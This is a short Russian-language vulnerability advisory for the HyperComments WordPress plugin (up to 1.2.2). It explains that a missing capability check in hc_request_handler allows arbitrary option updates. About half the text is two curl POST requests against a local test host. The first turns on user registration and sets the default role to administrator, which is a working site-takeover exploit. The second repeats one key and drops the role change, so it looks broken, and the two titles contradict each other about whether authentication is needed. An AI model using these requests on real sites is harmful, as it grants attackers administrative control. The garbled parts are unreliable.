
HyperComments <= 1.2.2 — Без аутентификации (Subscriber+) произвольное обновление параметров
HyperComments <= 1.2.2 - Неавторизованное (Subscriber+) обновление произвольных параметров
Плагин HyperComments для WordPress уязвим к несанкционированной модификации данных, которая может привести к повышению привилегий, из-за отсутствия проверки прав в функции hc_request_handler во всех версиях вплоть до 1.2.2 включительно. Это позволяет неавторизованным атакующим обновлять произвольные параметры на WordPress-сайте. Данную уязвимость можно использовать для изменения роли по умолчанию при регистрации на администратора и включения регистрации пользователей, что позволит атакующим получить административный доступ к уязвимому сайту.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"